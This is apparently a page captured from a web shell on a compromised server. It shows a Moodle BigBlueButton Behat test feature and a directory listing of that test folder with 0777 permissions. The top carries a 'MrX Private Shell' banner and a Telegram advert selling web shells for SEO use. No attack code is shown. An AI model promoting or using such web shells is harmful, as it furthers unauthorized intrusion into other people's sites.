__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
@mod @mod_bigbluebuttonbn @javascript
Feature: I can create a bigbluebuttonbn instance with default server
In case the BigBlueButton server has not been configured
As a user
I want to see a notification message
Background: Make sure that a course is created
Given I enable "bigbluebuttonbn" "mod" plugin
And the following "courses" exist:
| fullname | shortname | category |
| Test course | Test course | 0 |
And the following "users" exist:
| username | firstname | lastname | email |
| user1 | User1G1 | 1 | user1@example.com |
| teacher1 | TeacherG1 | 1 | teacher1@example.com |
And the following "course enrolments" exist:
| user | course | role |
| user1 | Test course | student |
| teacher1 | Test course | editingteacher |
And the following "activities" exist:
| activity | course | name | type |
| bigbluebuttonbn | Test course | BBB Instance name | 0 |
| bigbluebuttonbn | Test course | BBB Instance name 2 | 1 |
| bigbluebuttonbn | Test course | BBB Instance name 3 | 2 |
And I am on the "Test course" "course" page logged in as "admin"
Scenario Outline: Add an activity using default server for the three types of instance types
When I change window size to "large"
And I add a bigbluebuttonbn activity to course "Test course" section "1"
And I select "<type>" from the "Instance type" singleselect
Then I should see "Restrict access"
Examples:
| type |
| Room with recordings |
| Room only |
| Recordings only |
Scenario Outline: Users should see a notification message when accessing activities if the default server is used
When I am on the "BBB Instance name" Activity page logged in as <user>
Then "Join session" "link" should exist
And I <messageexist> "<shouldseemessage>"
Examples:
| user | shouldseemessage | messageexist |
| user1 | The BigBlueButton server credentials will soon expire. | should not see |
| teacher1 | The BigBlueButton server credentials will soon expire. | should see |
| admin | The BigBlueButton server credentials will soon expire. | should see |
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| fixtures | Folder | 0777 |
|
|
| add_instance.feature | File | 2.57 KB | 0777 |
|
| add_instance_in_empty_state.feature | File | 2.36 KB | 0777 |
|
| behat_mod_bigbluebuttonbn.php | File | 10.28 KB | 0777 |
|
| bigbluebuttonbn_activity_availability.feature | File | 2.31 KB | 0777 |
|
| completion.feature | File | 3.48 KB | 0777 |
|
| edit_instance.feature | File | 3.06 KB | 0777 |
|
| end_meeting.feature | File | 4.45 KB | 0777 |
|
| group_mode.feature | File | 7.95 KB | 0777 |
|
| guest_access.feature | File | 4.28 KB | 0777 |
|
| join_meeting.feature | File | 2.97 KB | 0777 |
|
| join_meeting_as_guest.feature | File | 2.4 KB | 0777 |
|
| lock_settings.feature | File | 2.99 KB | 0777 |
|
| meeting_roles.feature | File | 1.78 KB | 0777 |
|
| recordings.feature | File | 3.85 KB | 0777 |
|
| recordings_import.feature | File | 6.96 KB | 0777 |
|
| roles.feature | File | 1.11 KB | 0777 |
|
| room.feature | File | 2.22 KB | 0777 |
|
| start_meeting.feature | File | 4.41 KB | 0777 |
|
| subplugins.feature | File | 5.99 KB | 0777 |
|
| view_presentation.feature | File | 2.96 KB | 0777 |
|